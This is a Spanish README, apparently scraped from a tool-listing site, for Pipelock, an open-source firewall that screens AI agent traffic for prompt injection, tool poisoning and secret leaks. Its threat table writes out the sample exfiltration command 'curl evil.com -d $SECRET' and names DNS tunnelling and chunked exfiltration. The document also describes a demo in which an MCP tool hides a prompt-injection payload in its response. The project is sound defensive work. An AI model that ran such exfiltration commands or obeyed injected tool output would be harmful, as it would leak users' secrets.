| Inscripción de seguidores mTLS y distribución de políticas firmadas verificadas por lista | No | No | Sí |
| Vistas de flota del panel: Flota, Banco de trabajo, Incidente | No | No | Sí |

El informe firmado de `pipelock assess` es un derecho `assess` separado, independiente de Pro y Enterprise. La calificación gratuita de assess no cambia.

---

## Cómo Funciona

Pipelock utiliza **separación de capacidades**: en un despliegue con aplicación, el proceso agente tiene secretos pero no acceso directo a la red. Pipelock tiene acceso a la red pero no secretos de agente. Incluso si el agente recibe una inyección de mensaje, no puede alcanzar los controles del cortafuegos.

Tres modos de proxy HTTP (mismo puerto), más un proxy MCP dedicado e inspección A2A en las rutas forward y MCP:

- **Proxy de recuperación** (`/fetch?url=...`): Recupera la URL, extrae texto, escanea en busca de inyección, devuelve contenido limpio.
- **Proxy forward** (`HTTPS_PROXY`): Túnel HTTP CONNECT estándar sin cambios en el código de la aplicación. Aún se requiere configuración del proxy. La intercepción TLS opcional permite el escaneo de la carga útil.
- **Proxy WebSocket** (`/ws?url=ws://...`): Escaneo bidireccional de tramas con detección DLP + inyección.
- **Proxy MCP** (`pipelock mcp proxy`): Envuelve servidores MCP stdio o HTTP con escaneo bidireccional.
- **Inspección A2A**: Inspecciona el tráfico del protocolo Agente a Agente de Google a medida que cruza las rutas forward y MCP.

![Separación de capacidades de Pipelock: el tráfico del agente es escaneado por el cortafuegos antes de llegar a los servicios de Internet](https://raw.githubusercontent.com/luckypipewrench/pipelock/HEAD/docs/assets/how-it-works.svg)

<details>
<summary>Diagrama de texto (para terminales)</summary>```
┌──────────────────────────────────────────────────────────┐
│ PRIVILEGED ZONE                                          │
│                                                          │
│ AI Agent                                                 │
│ - API keys, credentials, private code and context        │
│ - Network-isolated by deployment                         │
└────────────────────────────┬─────────────────────────────┘
                             │ mediated request
                             │ fetch / CONNECT / WS / MCP / A2A
                             ▼
┌──────────────────────────────────────────────────────────┐
│ FIREWALL ZONE                                            │
│                                                          │
│ Pipelock Agent Firewall                                  │
│ - Destination: URL, SSRF, and DNS checks                 │
│ - Data: DLP, secret detection, and budgets               │
│ - Content: prompt injection and tool poisoning           │
│ - Policy: allow, block, or redact                        │
│ - No agent secrets                                       │
└────────────────────────────┬─────────────────────────────┘
                             │ approved request
                             ▼
┌──────────────────────────────────────────────────────────┐
│ INTERNET                                                 │
│                                                          │
│ Web APIs, websites, MCP servers, tools, and A2A services │
└──────────────────────────────────────────────────────────┘

Internet -- response --> Pipelock -- scanned content --> AI Agent

Configuración

Genera una configuración desde un preset incorporado, o deja que pipelock audit adapte una a tu proyecto:```bash pipelock presets pipelock generate config --list pipelock generate config --preset balanced > pipelock.yaml pipelock audit ./my-project -o pipelock.yaml

root@kitploit:~
| Preajuste CLI | Modo | Acción | Ideal para |
|------------|------|--------|----------|
| `balanced` | balanced | warn | Propósito general (por defecto) |
| `strict` | strict | block | Alta seguridad, industrias reguladas |
| `audit` | audit | warn | Evaluación solo de registro |
| `claude-code` | balanced | block | Claude Code sin supervisión |
| `cursor` | balanced | block | IDE Cursor |
| `generic-agent` | balanced | warn | Nuevos agentes durante el ajuste |
| `hostile-model` | strict | block | Modelos sin censura/abliterados |

Los cambios de configuración se detectan mediante el vigilante de archivos o SIGHUP. Referencia completa: **[docs/configuration.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/configuration.md)**

Para el ajuste de falsos positivos: **[docs/false-positive-tuning.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/false-positive-tuning.md)**

---

## Guías de Integración

- **[Claude Code](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/claude-code.md):** Configuración del proxy MCP, configuración de `.claude.json`
- **[OpenAI Codex](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/codex.md):** Envoltura del proxy MCP, proxy directo, integración con sandbox
- **[Cline](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/cline.md):** Envoltura del proxy MCP para el `mcp.json` de Cline
- **[OpenCode](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/opencode.md):** Envoltura del proxy MCP para servidores MCP locales y remotos de OpenCode
- **[Zed](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/zed.md):** Envoltura del proxy MCP para el bloque `context_servers` de Zed en `settings.json`
- **[OpenAI Agents SDK](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/openai-agents.md):** `MCPServerStdio`, traspasos multiagente
- **[Google ADK](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/google-adk.md):** `McpToolset`, `StdioConnectionParams`
- **[AutoGen](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/autogen.md):** `StdioServerParams`, `mcp_server_tools()`
- **[CrewAI](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/crewai.md):** Envoltura de `MCPServerStdio`, `MCPServerAdapter`
- **[LangGraph](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/langgraph.md):** `MultiServerMCPClient`, `StateGraph`
- **[Hermes](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/hermes.md):** Cobertura completa de plugin o envoltura más ligera solo MCP para el agente de Nous Research, con preservación de sidecar de cabecera de autenticación
- **[JetBrains/Junie](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/jetbrains.md):** Envoltura del proxy MCP para IntelliJ, PyCharm, GoLand ([walkthrough](https://pipelab.org/learn/jetbrains-integration/))
- **Cursor:** `pipelock cursor install` registra Pipelock como un hook de Cursor para ejecución de shell, llamadas a herramientas MCP y lecturas de archivos; usa `--config` para incrustar una ruta de política validada y `pipelock cursor remove` para eliminar los hooks gestionados por Pipelock. También puedes usar `configs/cursor.yaml` con el mismo patrón de proxy MCP que [Claude Code](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/claude-code.md) ([walkthrough](https://pipelab.org/learn/cursor-integration/))
- **VS Code:** `pipelock vscode install` reescribe `.vscode/mcp.json` para enrutar cada servidor MCP a través del proxy MCP; `--global` apunta al `mcp.json` a nivel de usuario
- **[OpenClaw](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/openclaw.md):** sidecar de puerta de enlace, contenedor de inicio, envoltura de configuración
- **Cualquier otro cliente MCP:** `pipelock generate mcporter` lee cualquier archivo JSON con un objeto `mcpServers` de nivel superior y envuelve cada servidor a través del proxy de Pipelock, de modo que un cliente que no esté en la lista anterior aún se enrute a través del escaneo en un solo comando.

---

## Despliegue```bash
# Docker
docker pull ghcr.io/luckypipewrench/pipelock:latest
docker run -p 8888:8888 -v ./pipelock.yaml:/config/pipelock.yaml:ro \
  ghcr.io/luckypipewrench/pipelock:latest \
  run --config /config/pipelock.yaml --listen 0.0.0.0:8888

# Network-isolated agent with Docker Compose
pipelock generate docker-compose --agent claude-code -o docker-compose.yaml
docker compose up

# Kubernetes with Helm
helm install pipelock charts/pipelock/

Recetas de producción para Docker Compose, Kubernetes sidecar + NetworkPolicy, iptables/nftables y macOS PF: docs/guides/deployment-recipes.md


Integración con CI```yaml

.github/workflows/pipelock.yaml

  • uses: luckyPipewrench/pipelock@v2 with: scan-diff: 'true' fail-on-findings: 'true'
root@kitploit:~
La acción descarga un binario precompilado, ejecuta `pipelock audit`, escanea el diff del PR en busca de secretos filtrados y sube el informe de auditoría como un artefacto del flujo de trabajo. Consulta [`examples/ci-workflow.yaml`](https://github.com/luckypipewrench/pipelock/blob/HEAD/examples/ci-workflow.yaml) para un flujo de trabajo completo.

### Demo Ejecutable: Inyección de Respuesta de Herramienta

El entorno [`examples/tool-response-injection/`](https://github.com/luckypipewrench/pipelock/blob/HEAD/examples/tool-response-injection/) ejecuta una demo de extremo a extremo donde una herramienta MCP con un nombre y descripción inofensivos oculta una carga útil de inyección de prompt en su respuesta. Pipelock bloquea la respuesta antes de que llegue al agente y emite recibos de acción firmados que un tercero puede verificar. La misma demo se ejecuta contra tres transportes con una clave de firma compartida:

- MCP stdio
- MCP HTTP upstream
- HTTP fetch```bash
cd examples/tool-response-injection
python3 demo.py    # needs python3 + cryptography + pipelock on PATH

Reglas de la Comunidad

Detección que puedes extender, compartir y distribuir más rápido que el binario principal.

La detección integrada de DLP, inyección y envenenamiento de herramientas de Pipelock es potente desde el primer momento. Los paquetes de reglas comunitarias te permiten ir más allá: agrega tus propios patrones para las formas de exfiltración, formatos de secretos y trucos de inyección que tu pila ve, fírmalos y distribúyelos en un ritmo que tú controlas en lugar de esperar una versión.

Instala el paquete oficial en una línea:```bash pipelock rules install pipelock-community

root@kitploit:~
Los paquetes de reglas están firmados y bloqueados por versión. El ciclo de vida completo es un comando enviado, no una edición de configuración:```bash
pipelock rules list                    # what is installed
pipelock rules diff pipelock-community # what a new version would change
pipelock rules update pipelock-community
pipelock rules verify                  # confirm signatures against the trusted keyring
pipelock rules remove pipelock-community

Escribe tu propia. Una regla es una entrada YAML pequeña con un nombre, una categoría (DLP, inyección o tool-poison) y un patrón. Fírmala con tu clave, colócala en un paquete, y cada instancia de Pipelock que ejecutes la recogerá. Compártela con la comunidad y protege a todos los demás también.

Contribuye con una regla al paquete público pipelock-rules, o lee docs/rules.md para construir y firmar tu propia.


Documentación

Directorio completo de documentación: docs/


Estructura del Proyecto```text

cmd/pipelock/ CLI entry point internal/ cli/ 60+ Cobra commands (run, check, init, generate, mcp, session, posture, rules, ...) diag/ pipelock doctor and install-verification diagnostics session/ pipelock session, pipelock adaptive, and pipelock baseline operator CLIs setup/ pipelock init sidecar: companion-proxy manifest generation (K8s) config/ YAML config, validation, defaults, hot-reload (fsnotify) scanner/ Ordered URL scanning pipeline + response injection detection audit/ Structured JSON logging (zerolog) + event emission dispatch proxy/ HTTP proxy: fetch, forward (CONNECT), WebSocket, DNS pinning, TLS mcp/ MCP proxy + bidirectional scanning + tool poisoning + chains integrity/ MCP binary/script integrity manifests and trust workflow discover/ IDE/agent config discovery (Claude Code, Cursor, VS Code, JetBrains) killswitch/ Emergency deny-all (6 sources) + port-isolated API envelope/ Mediation envelope (RFC 8941) for sideband metadata media/ Image metadata stripping (JPEG/PNG byte-level surgery) normalize/ Text-normalization transforms (NFKC, invisible chars, leetspeak, whitespace, vowel-fold) for the scanner cascade receipt/ Action receipt signing + hash-chained evidence posture/ Posture capsule schema, signing, scoring, verify policy session/ Session state, taint classification, task boundaries, trust overrides rules/ Bundle loader, tier taxonomy, RequiredFeatures enforcement sandbox/ Landlock, seccomp, netns, macOS sandbox-exec shield/ Airlock, browser shield, SVG hardening signing/ Ed25519 key management integrity/ SHA256 file integrity monitoring report/ HTML/JSON audit report generation enterprise/ Multi-agent features (ELv2) sdk/conformance/ Cross-implementation receipt verification test vectors charts/ Helm chart for Kubernetes deployment configs/ 7 built-in preset config files docs/ Guides, references, compliance mappings

root@kitploit:~
---

## Pruebas

Pipelock es probado como un producto de seguridad. El núcleo de código abierto tiene pruebas unitarias, de integración y de extremo a extremo. Una suite adversarial privada separada ejercita clases de ataque contra el binario de producción. Cada bypass se convierte en una prueba de regresión antes del lanzamiento.

| Métrica | Valor |
|--------|-------|
| Pruebas de Go (con `-race`) | Rutas unitarias, de integración y de extremo a extremo |
| Puerta de cobertura (codecov) | 91% proyecto principal Apache-2.0, 95% parche en código nuevo |
| Cobertura de evasión | Matriz pública de resistencia a bypass + corpus adversarial privado |
| Sobrecarga de ruta crítica del escáner | ~40us por escaneo de URL (benchmark de ruta crítica; ver [docs/performance.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/performance.md)) |
| Matriz de CI | Go 1.25 + 1.26, CodeQL, golangci-lint |
| Cadena de suministro | Procedencia SLSA, SBOM CycloneDX, firmas cosign |

Ejecute `make test` para verificar localmente. Benchmark independiente: el corpus público [agent-egress-bench](https://github.com/luckyPipewrench/agent-egress-bench). Ver los [resultados en vivo](https://pipelab.org/gauntlet/).

---

## Créditos

- Arquitectura influenciada por [el sandboxing de Claude Code de Anthropic](https://www.anthropic.com/engineering/claude-code-sandboxing) y [sandbox-runtime](https://github.com/anthropic-experimental/sandbox-runtime)
- Modelo de amenazas informado por [OWASP Agentic AI Top 10](https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/)
- Ver [docs/comparison.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/comparison.md) para cómo se relaciona Pipelock con otras herramientas en este espacio
- Contribuciones de revisión de seguridad de Dylan Corrales

Se aceptan contribuciones. Ver [CONTRIBUTING.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/CONTRIBUTING.md) para pautas.

Si Pipelock es útil, por favor [marque este repositorio con estrella](https://github.com/luckyPipewrench/pipelock). Ayuda a otros a encontrar el proyecto.

---

## Licencia

El núcleo de Pipelock tiene licencia bajo la **Apache License 2.0**. Derechos de autor 2026 Joshua Waldrep.

Las características multi-agente (identidad por agente, presupuestos y aislamiento de configuración) están en el directorio `enterprise/`, controladas por la etiqueta de compilación `enterprise` y tienen licencia bajo la **Elastic License 2.0 (ELv2)**. Estas características se activan con una clave de licencia válida.

El núcleo de código abierto funciona de forma independiente sin características de pago. Todo el escaneo, detección y protección de un solo agente es gratuito.

Los artefactos de lanzamiento precompilados (Homebrew, lanzamientos de GitHub, imágenes Docker) incluyen código de nivel de pago que se activa con una clave de licencia válida. Compilar desde el código fuente con `go install` o el `Dockerfile` del repositorio produce un binario solo para la Comunidad.

Ver [LICENSE](https://github.com/luckypipewrench/pipelock/blob/HEAD/LICENSE) para el texto de Apache 2.0 y [enterprise/LICENSE](https://github.com/luckypipewrench/pipelock/blob/HEAD/enterprise/LICENSE) para el texto de ELv2.
Descargar herramienta
ModoSeguridadNavegación WebCaso de Uso
estrictoSolo lista permitidaNingunaIndustrias reguladas, alta seguridad
equilibradoBloquea ingenuos + detecta sofisticadosMediante fetch o proxy de reenvíoLa mayoría de los desarrolladores (predeterminado)
auditoríaSolo registroSin restriccionesEvaluación antes de la aplicación
Vector de AtaqueEstrictoEquilibradoAuditoría
curl evil.com -d $SECRETPrevenidoPrevenidoRegistrado
Secreto en parámetros de consulta de URLPrevenidoDetectado por DLPRegistrado
Secreto codificado en Base64 en URLPrevenidoDetectado por entropía y DLP decodificadoRegistrado
Túnel DNSPrevenidoDetectado por entropía de subdominioRegistrado
Exfiltración por fragmentosPrevenidoDetectado por comprobaciones de tasa, presupuesto y fragmentosRegistrado
Blob cifrado con clave pública en URLPrevenidoRegistrado cuando la entropía lo señalaRegistrado
CaracterísticaPipelockEscáneres (agent-scan)Sandboxes (srt)Agentes de kernel (agentsh)
Prevención de exfiltración de secretosEstricto bloquea; equilibrado detectaParcial (modo proxy)Parcial (a nivel de dominio)Sí
DLP + análisis de entropíaSíNoNoParcial
Detección de inyección de indicacionesSíSíNoNo
Escaneo MCP (bidireccional + envenenamiento de herramientas)SíSíNoNo
Proxy WebSocket (escaneo de tramas)SíNoNoNo
Transporte HTTP MCP (HTTP transmisible)SíNoNoNo
Interruptor de apagado de emergencia (6 fuentes)SíNoNoNo
Detección de cadenas de llamadas a herramientasSíNoNoNo
Sandbox de procesos (sin Docker)SíNoNoSí (a nivel de kernel)
Binario único, cero dependenciasSíNo (Python)No (npm)No (kernel)
AmenazaCobertura
ASI01 Secuestro del Objetivo del AgenteFuerte: MCP bidireccional + escaneo de respuestas
ASI02 Uso Indebido de HerramientasParcial: proxy como herramienta controlada, escaneo MCP
ASI03 Abuso de Identidad y PrivilegiosFuerte: separación de capacidades + protección SSRF
ASI04 Vulnerabilidades de la Cadena de SuministroParcial: monitoreo de integridad + escaneo MCP
ASI05 Ejecución de Código InesperadaModerado: aprobación HITL, valores predeterminados de fallo-cerrado
ASI06 Envenenamiento de Memoria y ContextoModerado: detección de inyección + propagación de mancha de sesión
ASI07 Comunicación Insegura entre AgentesParcial: escaneo MCP/A2A, ID de agente, integridad, firma
ASI08 Fallos en CascadaModerado: arquitectura de fallo-cerrado, limitación de tasa
ASI09 Explotación de Confianza Humano-AgenteParcial: modos HITL, registro de auditoría
ASI10 Agentes MaliciososFuerte: lista permitida de dominios + limitación de tasa + separación de capacidades

Detalles, ejemplos de configuración y análisis de brechas: docs/owasp-mapping.md

  • Redacción de solicitudes: la reescritura JSON opcional reemplaza los valores de secretos coincidentes con marcadores de posición tipificados como <pl:aws-access-key:1> en argumentos HTTP, WebSocket y MCP tools/call. Los recibos registran el perfil activo y los recuentos por clase en lugar de secretos en texto plano.
  • Protección de direcciones: la validación de direcciones ETH, BTC, SOL y BNB detecta intercambios de destinos similares mediante huellas digitales de prefijo/sufijo y una lista permitida de operadores.
  • Hallazgos explicables: pipelock explain <url> (también explain event <id> y explain mcp) imprime el escáner, la capa, la regla de coincidencia, la superficie inspeccionada y el control de configuración más específico disponible para un falso positivo. Consulte docs/cli/explain.md.
  • Tokens canario: pipelock canary genera configuración de honeytoken. Un secreto sintético que aparece en el tráfico saliente demuestra que un agente o algo en su cadena está exfiltrando variables de entorno. Consulte tokens canario.
  • Escaneo de archivos de habilidades: pipelock skill-scan inventaria los archivos de habilidades del agente, los compara con un archivo de bloqueo propiedad del operador y marca combinaciones de origen a destino, como credencial a destino de red o shell a escritura, con evidencia de línea antes de que se ejecute algo. Consulte docs/cli/skill-scan.md.
  • Documento¿Qué contiene?
    Referencia de ConfiguraciónTodos los campos de configuración, valores por defecto, comportamiento de recarga en caliente, ajustes predefinidos
    Política de SolicitudesGuías de denegar/advertir por defecto permitido en operaciones de API salientes (GraphQL / discriminador / lote), fallo cerrado (v2.6)
    Redacción de SolicitudesReescritura de solicitudes JSON a través de transporte HTTP, WebSocket y MCP
    Ajuste de Falsos PositivosIdentificar, suprimir y ajustar hallazgos del escáner
    API de EscaneoPunto final de evaluación para escaneo programático
    Recetas de DespliegueDocker Compose, sidecar K8s, iptables, macOS PF
    pipelock doctorDiagnósticos de despliegue configurado vs. aplicable para proxy, TLS, MCP, file_sentry, telemetría y señales de contención
    pipelock dashboardConfiguración del panel del operador: modos de autenticación, permisos RBAC, evidencia, exenciones, presupuestos, confianza y claves, vistas de flota, copia de seguridad/restauración y certificados de cobertura
    pipelock verify-installEscaneo determinista, prueba local y comprobaciones de humo de egreso directo
    pipelock updateAutoactualización verificada: manifiesto de versión firmado, verificación de suma de comprobación, verificación cruzada opcional con cosign, instalación atómica, reversión
    Resistencia a BypassTécnicas de evasión conocidas, mitigaciones, limitaciones
    Ataques Conocidos BloqueadosAtaques reales con fragmentos de reproducción
    Integración SIEMEsquema de registros, salida CEF/syslog, reenvío Enterprise duradero, ciclo de vida, métricas, consultas SIEM
    Referencia de MétricasFamilias de métricas Prometheus, etiquetas, estadísticas JSON y reglas de alerta
    Reglas de la ComunidadInstalar, configurar y crear paquetes de reglas firmados
    Garantía de SeguridadModelo de seguridad, límites de confianza, cadena de suministro
    Documentos de SeguridadPolítica de divulgación, rutas no soportadas, rotación de claves, modelos de amenaza TLS CA y Audit Packet
    Preparación EmpresarialControles empresariales incluidos, ruta de evaluación, decisiones de despliegue y límites explícitos
    Construcciones ReproduciblesVerificación binaria byte por byte OSS, entradas estables, integración de versiones y alcance
    Supresión de HallazgosNombres de reglas, coincidencia de rutas, comentarios en línea
    Modos de TransporteTodos los modos proxy y sus capacidades de escaneo
    OWASP MCP Top 10Cobertura de OWASP MCP Top 10
    OWASP Agentic Top 15Cobertura de OWASP Agentic AI Top 15
    OWASP LLM Top 10Cobertura de OWASP Top 10 for LLM Applications (2025)
    EU AI ActMapeo de cumplimiento de la EU AI Act
    NIST 800-53Mapeo de controles NIST SP 800-53 Rev. 5
    Mapeo AssessMapa de controles en tiempo de ejecución a los marcos contra los cuales pipelock assess produce evidencia, para revisión de adquisiciones y auditoría
    Especificación de Política v0.1Formato de política de firewall de agente portátil
    Sobre de MediaciónCabeceras de metadatos de banda lateral, configuración, interacción con recibos
    Política de MediosEliminación de esteganografía, endurecimiento SVG, tipos permitidos, límites de tamaño
    Terminología de EvidenciaReferencia rápida para ActionReceipt, EvidenceReceipt, grabadora de vuelo, puntos de control, anclas, certificados de cobertura y Audit Packets, con las distinciones integridad-vs-completitud y fijado-vs-no fijado
    Verificación de Recibospipelock verify-receipt, verificación de Informe de Recibos de Flota, pipelock-verifier independiente, suite de conformidad, integridad de cadena
    Perfiles de Especificación de RecibosPredicado de atestación in-toto para recibos de acción, con perfiles complementarios SCITT y AARP y mapeo de arte previo
    Modelo de Amenaza de Audit PacketLo que los Audit Packets verificados prueban, lo que no prueban y las suposiciones de confianza que las partes dependientes deben fijar
    Cobertura de Transporte de RecibosMatriz de emisión de recibos a través de rutas fetch, forward, CONNECT/TLS, WebSocket, MCP y A2A
    Learn-and-LockContratos de comportamiento por agente: observar, compilar, sombrear, ratificar, promover (v2.4)
    FederaciónVerificación de sobre de mediación entrante, formato de actor SPIFFE, directorio bien conocido RFC 9421 (v2.4)
    Cabecera de Razón de BloqueoEsquema X-Pipelock-Block-Reason, vocabulario de razones, sugerencias de reintento (v2.4)
    Punto Final de SaludDetección de cuña /health 503, latidos de subsistemas, configuración del panel del operador (v2.4)
    Contención de Hostpipelock contain install / run / verify / rollback / add-tool / grant-workspace / revoke-workspace / ca-refresh para contención de coincidencia de propietario nftables de 3-UID con atestación de postura observada por el kernel (v2.5)
    Manifiestos de Integridad MCPGenerar, verificar, firmar y requerir manifiestos de integridad binaria MCP de confianza (v2.5)
    CLI AdaptativoInspeccionar y vaciar el estado de ejecución de la aplicación adaptativa a través de la API de administración (v2.5)
    ConductorEl plano de control de flota Enterprise: distribución de políticas, sumidero de auditoría, eliminación remota, reversión, confianza mTLS/SPIFFE, licencias (v2.7, Enterprise)
    Manual del Operador de ConductorRecorrido práctico de flota local: arranque, servir, firmar un lote, verificar sin conexión
    Inicio Rápido del Operador de ConductorDe cero a una auditoría de flota de solo lectura: licencia, certificado mTLS del operador, token de auditor, comandos de solo lectura
    Despliegue Empresarial en KubernetesFlota Conductor basada en Helm: plano de control, seguidores, sumidero de flota, Secretos PKI, NetworkPolicies
    pipelock licenseInstalar, inspeccionar y verificar la licencia que desbloquea funciones de pago (Pro agents, Enterprise fleet)
    pipelock baselineInspeccionar, ratificar y reaprender perfiles de línea base de comportamiento a través de la API de administración autenticada
    Cápsula de PosturaInstantáneas de postura firmadas, CLI posture verify, puerta CI, modelo de puntuación
    pipelock init sidecarGenerar manifiestos de proxy acompañante Kubernetes forzados y contratos de lanzador MCP (merge estratégico, Kustomize, valores Helm)
    pipelock sessionCLI del operador para inspección y recuperación de esclusa de aire (listar, inspeccionar, explicar, liberar, terminar, recuperar)
    pipelock keys statusInventario unificado de claves de firma: fuente por propósito, presencia, legibilidad, validez y huella digital de clave pública
    Grabadora de VueloRegistro de evidencia firmado con cadena hash: comportamiento activado por defecto, sello raíz de transcripción, redacción, depósito en garantía, rotación de claves
    Intercepción TLSMITM de túnel CONNECT: configuración de CA, escaneo de cuerpo/cabecera/respuesta, dominios de paso
    Tokens de SeñueloSecretos sintéticos que activan una alerta en el momento en que un agente intenta exfiltrar uno
    Integración de DetecciónAlimentar decisiones y evidencia de Pipelock en tuberías de detección / SIEM externas
    Revisión de PRRevisión de seguridad AI activada manualmente para pull requests (comentario /review)
    Frontal del Inspector MCPEnrutar herramientas de desarrollo MCP (Inspector, servidores de prueba) a través del escaneo de Pipelock
    pipelock demoEscenarios de ataque autocontenidos con recibos firmados y verificables sin conexión, sin necesidad de configuración ni red
    InsigniasMarkdown listo para usar para la insignia scanned by pipelock en proyectos descendentes